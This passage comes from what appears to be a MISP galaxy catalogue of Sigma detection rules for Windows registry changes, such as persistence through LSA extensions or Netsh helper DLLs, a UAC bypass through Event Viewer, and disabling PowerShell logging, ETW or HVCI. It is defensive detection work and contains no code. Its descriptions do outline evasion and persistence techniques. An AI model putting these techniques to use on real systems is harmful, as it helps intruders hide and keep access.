- https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ - webarchive
- https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise - webarchive
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-16 |
| falsepositive | ['As this is controlled by group policy as well as user settings. Some false positives may occur.'] |
| filename | registry_set_internet_explorer_disable_first_run_customize.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Old TLS1.0/TLS1.1 Protocol Version Enabled
Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
Internal MISP references
UUID 439957a7-ad86-4a8f-9705-a28131c6821b which can be used as unique global reference for Old TLS1.0/TLS1.1 Protocol Version Enabled in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-09-05 |
| falsepositive | ['Legitimate enabling of the old tls versions due to incompatibility'] |
| filename | registry_set_tls_protocol_old_version_enabled.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Register New IFiltre For Persistence
Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
Internal MISP references
UUID b23818c7-e575-4d13-8012-332075ec0a2b which can be used as unique global reference for Register New IFiltre For Persistence in MISP communities and other software using the MISP galaxy
External references
- https://persistence-info.github.io/Data/ifilters.html - webarchive
- https://github.com/gtworek/PSBits/tree/master/IFilter - webarchive
- https://twitter.com/0gtweet/status/1468548924600459267 - webarchive
- https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Legitimate registration of IFilters by the OS or software'] |
| filename | registry_set_persistence_ifilter.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
Internal MISP references
UUID 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 which can be used as unique global reference for IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols in MISP communities and other software using the MISP galaxy
External references
- https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content - webarchive
- https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries - webarchive
- https://twitter.com/JAMESWT_MHT/status/1699042827261391247 - webarchive
- https://twitter.com/M_haggis/status/1699056847154725107 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea) |
| creation_date | 2023-09-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_ie_security_zone_protocol_defaults_downgrade.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Suspicious Service Installed
Detects installation of NalDrv or PROCEXP152 services via registry keys pointing to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU).
Internal MISP references
UUID f2485272-a156-4773-82d7-1d178bc4905b which can be used as unique global reference for Suspicious Service Installed in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | xknow (@xknow_infosec), xorxes (@xor_xes) |
| creation_date | 2019-04-08 |
| falsepositive | ["Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it."] |
| filename | registry_set_susp_service_installed.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.t1562.001', 'attack.defense-evasion'] |
PowerShell Logging Disabled Via Registry Key Tampering
Detects changes to the registry of the currently logged-in user that disable PowerShell module logging, script block logging, transcription or script execution logging.
Internal MISP references
UUID fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 which can be used as unique global reference for PowerShell Logging Disabled Via Registry Key Tampering in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-04-02 |
| falsepositive | ['Unknown'] |
| filename | registry_set_powershell_logging_disabled.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.001'] |
Potential Persistence Via Event Viewer Events.asp
Detects a potential registry persistence technique that abuses the Event Viewer "Events.asp" link.
Internal MISP references
UUID a1e11042-a74a-46e6-b07c-c4ce8ecc239b which can be used as unique global reference for Potential Persistence Via Event Viewer Events.asp in MISP communities and other software using the MISP galaxy
External references
- https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks - webarchive
- https://twitter.com/nas_bench/status/1626648985824788480 - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md - webarchive
- https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-17 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_event_viewer_events_asp.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Periodic Backup For System Registry Hives Enabled
Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, the OS will back up the System registry hives on restart to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
Internal MISP references
UUID 973ef012-8f1a-4c40-93b4-7e659a5cd17f which can be used as unique global reference for Periodic Backup For System Registry Hives Enabled in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-07-01 |
| falsepositive | ['Legitimate need for RegBack feature by administrators.'] |
| filename | registry_set_enable_periodic_backup.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1113'] |
Potential Persistence Via Scrobj.dll COM Hijacking
Detects use of scrobj.dll, which looks for the ScriptletURL key to get the location of the script to execute.
Internal MISP references
UUID fe20dda1-6f37-4379-bbe0-a98d400cae90 which can be used as unique global reference for Potential Persistence Via Scrobj.dll COM Hijacking in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-20 |
| falsepositive | ['Legitimate use of the dll.'] |
| filename | registry_set_persistence_scrobj_dll.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015'] |
Running Chrome VPN Extensions via the Registry 2 VPN Extension
Detects the installation of two Chrome VPN extensions via the registry.
Internal MISP references
UUID b64a026b-8deb-4c1d-92fd-98893209dff1 which can be used as unique global reference for Running Chrome VPN Extensions via the Registry 2 VPN Extension in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-28 |
| falsepositive | ['Unknown'] |
| filename | registry_set_chrome_extension.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.persistence', 'attack.t1133'] |
New File Association Using Exefile
Detects the abuse of the exefile handler in a new file association. This is used to bypass security products.
Internal MISP references
UUID 44a22d59-b175-4f13-8c16-cbaef5b581ff which can be used as unique global reference for New File Association Using Exefile in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Andreas Hunkeler (@Karneades) |
| creation_date | 2021-11-19 |
| falsepositive | ['Unknown'] |
| filename | registry_set_file_association_exefile.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Potential EventLog File Location Tampering
Detects tampering with the EventLog service "file" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting.
Internal MISP references
UUID 0cb8d736-995d-4ce7-a31e-1e8d452a1459 which can be used as unique global reference for Potential EventLog File Location Tampering in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | D3F7A5105 |
| creation_date | 2023-01-02 |
| falsepositive | ['Unknown'] |
| filename | registry_set_evtx_file_key_tamper.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.002'] |
UAC Bypass via Event Viewer
Detects a UAC bypass method using the Windows Event Viewer.
Internal MISP references
UUID 7c81fec3-1c1d-43b0-996a-46753041b1b6 which can be used as unique global reference for UAC Bypass via Event Viewer in MISP communities and other software using the MISP galaxy
External references
- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - webarchive
- https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2017-03-19 |
| falsepositive | ['Unknown'] |
| filename | registry_set_uac_bypass_eventvwr.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002', 'car.2019-04-001'] |
ETW Logging Disabled In .NET Processes - Sysmon Registry
Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies.
Internal MISP references
UUID bf4fc428-dcc3-4bbd-99fe-2422aeee2544 which can be used as unique global reference for ETW Logging Disabled In .NET Processes - Sysmon Registry in MISP communities and other software using the MISP galaxy
External references
- https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr - webarchive
- https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code - webarchive
- https://twitter.com/xpn/status/1268712093928378368 - webarchive
- http://managed670.rssing.com/chan-5590147/all_p1.html - webarchive
- https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_ - webarchive
- https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39 - webarchive
- https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf - webarchive
- https://bunnyinside.com/?term=f71e8cb9c76a - webarchive
- https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables - webarchive
- https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/ - webarchive
- https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-06-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_dot_net_etw_tamper.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112', 'attack.t1562'] |
Potential Persistence Via Excel Add-in - Registry
Detects potential persistence via the creation of an Excel add-in (XLL) file that is run automatically when Excel is started.
Internal MISP references
UUID 961e33d1-4f86-4fcf-80ab-930a708b2f82 which can be used as unique global reference for Potential Persistence Via Excel Add-in - Registry in MISP communities and other software using the MISP galaxy
External references
- https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_xll.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2023-01-15 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_xll.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1137.006'] |
Potential Persistence Via MyComputer Registry Keys
Detects modification of the "Default" value of the "MyComputer" key and its subkeys to point to a custom binary that will be launched whenever the associated action is executed (see the reference section for an example).
Internal MISP references
UUID 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06 which can be used as unique global reference for Potential Persistence Via MyComputer Registry Keys in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-09 |
| falsepositive | ['Unlikely but if you experience FPs add specific processes and locations you would like to monitor for'] |
| filename | registry_set_persistence_mycomputer.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Suspicious Space Characters in RunMRU Registry Path - ClickFix
Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using ClickFix techniques to hide malicious commands in the Windows Run dialog box from the naked eye.
Internal MISP references
UUID 7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e which can be used as unique global reference for Suspicious Space Characters in RunMRU Registry Path - ClickFix in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-11-04 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_susp_runmru_space_character.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1204.004', 'attack.defense-evasion', 'attack.t1027.010'] |
New Root or CA or AuthRoot Certificate to Store
Detects the addition of new Root, CA or AuthRoot certificates to the Windows registry.
Internal MISP references
UUID d223b46b-5621-4037-88fe-fda32eead684 which can be used as unique global reference for New Root or CA or AuthRoot Certificate to Store in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store - webarchive
- https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-04-04 |
| falsepositive | ['Unknown'] |
| filename | registry_set_install_root_or_ca_certificat.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1490'] |
Potential Persistence Via CHM Helper DLL
Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence.
Internal MISP references
UUID 976dd1f2-a484-45ec-aa1d-0e87e882262b which can be used as unique global reference for Potential Persistence Via CHM Helper DLL in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_chm.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
New Netsh Helper DLL Registered From A Suspicious Location
Detects changes to the Netsh registry key that add a new DLL value located in a suspicious location. This change might indicate a persistence attempt via a malicious Netsh helper DLL.
Internal MISP references
UUID e7b18879-676e-4a0e-ae18-27039185a8e7 which can be used as unique global reference for New Netsh Helper DLL Registered From A Suspicious Location in MISP communities and other software using the MISP galaxy
External references
- https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ - webarchive
- https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-11-28 |
| falsepositive | ['Unknown'] |
| filename | registry_set_netsh_help_dll_persistence_susp_location.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.007'] |
Suspicious Keyboard Layout Load
Detects the keyboard preload installation of a suspicious keyboard layout, e.g. a Chinese, Iranian or Vietnamese layout loaded in a user session on systems maintained by US staff only.
Internal MISP references
UUID 34aa0252-6039-40ff-951f-939fd6ce47d8 which can be used as unique global reference for Suspicious Keyboard Layout Load in MISP communities and other software using the MISP galaxy
External references
- https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index - webarchive
- https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-10-12 |
| falsepositive | ["Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)"] |
| filename | registry_set_susp_keyboard_layout_load.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1588.002'] |
Sysmon Driver Altitude Change
Detects changes to the Sysmon driver altitude value. If the Sysmon driver is configured to load at the altitude of another registered service, it will fail to load at boot.
Internal MISP references
UUID 4916a35e-bfc4-47d0-8e25-a003d7067061 which can be used as unique global reference for Sysmon Driver Altitude Change in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | B.Talebi |
| creation_date | 2022-07-28 |
| falsepositive | ['Legitimate driver altitude change to hide sysmon'] |
| filename | registry_set_change_sysmon_driver_altitude.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Allow RDP Remote Assistance Feature
Detects enabling of the RDP Remote Assistance feature to allow a specific user to connect via RDP to the targeted machine.
Internal MISP references
UUID 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b which can be used as unique global reference for Allow RDP Remote Assistance Feature in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-19 |
| falsepositive | ['Legitimate use of the feature (alerts should be investigated either way)'] |
| filename | registry_set_allow_rdp_remote_assistance_feature.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Potential Persistence Via LSA Extensions
Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
Internal MISP references
UUID 41f6531d-af6e-4c6e-918f-b946f2b85a36 which can be used as unique global reference for Potential Persistence Via LSA Extensions in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_persistence_lsa_extension.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
RDP Sensitive Settings Changed
Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
Internal MISP references
UUID 3f6b7b62-61aa-45db-96bd-9c31b36b653c which can be used as unique global reference for RDP Sensitive Settings Changed in MISP communities and other software using the MISP galaxy
External references
- http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry - webarchive
- https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services - webarchive
- https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ - webarchive
- https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry - webarchive
- https://blog.sekoia.io/darkgate-internals/ - webarchive
- https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 - webarchive
- https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html - webarchive
- http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali |
| creation_date | 2022-08-06 |
| falsepositive | ['Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)'] |
| filename | registry_set_terminal_server_tampering.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.t1112'] |
Registry Disable System Restore
Detects modification of the registry to disable System Restore on the computer.
Internal MISP references
UUID 5de03871-5d46-4539-a82d-3aa992a69a83 which can be used as unique global reference for Registry Disable System Restore in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-04-04 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disable_system_restore.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1490'] |
VBScript Payload Stored in Registry
Detects VBScript content stored in registry keys, as seen being used by the UNC2452 group.
Internal MISP references
UUID 46490193-1b22-4c29-bdd6-5bf63907216f which can be used as unique global reference for VBScript Payload Stored in Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-03-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_vbs_payload_stored.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
New TimeProviders Registered With Uncommon DLL Name
Detects processes setting a new DLL in the DllName value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
Internal MISP references
UUID e88a6ddc-74f7-463b-9b26-f69fc0d2ce85 which can be used as unique global reference for New TimeProviders Registered With Uncommon DLL Name in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-06-19 |
| falsepositive | ['Unknown'] |
| filename | registry_set_timeproviders_dllname.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1547.003'] |
Antivirus Filter Driver Disallowed On Dev Drive - Registry
Detects activity indicating that a user has disabled the ability of the antivirus minifilter driver to inspect a "Dev Drive".
Internal MISP references
UUID 31e124fb-5dc4-42a0-83b3-44a69c77b271 which can be used as unique global reference for Antivirus Filter Driver Disallowed On Dev Drive - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @kostastsale, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-11-05 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_devdrv_disallow_antivirus_filter.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Office Autorun Keys Modification
Detects modification of autostart extensibility points (ASEP) in the registry.
Internal MISP references
UUID baecf8fb-edbf-429f-9ade-31fc3f22b970 which can be used as unique global reference for Office Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_office.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Hypervisor Enforced Code Integrity Disabled
Detects changes to the HypervisorEnforcedCodeIntegrity registry key where the "Enabled" value is set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to run in the kernel.
Internal MISP references
UUID 8b7273a4-ba5d-4d8a-b04f-11f2900d043a which can be used as unique global reference for Hypervisor Enforced Code Integrity Disabled in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Anish Bogati |
| creation_date | 2023-03-14 |
| falsepositive | ['Unknown'] |
| filename | registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Disable Windows Defender Functionalities Via Registry Keys
Detects when attackers or tools disable Windows Defender functionalities via the Windows registry.
Internal MISP references
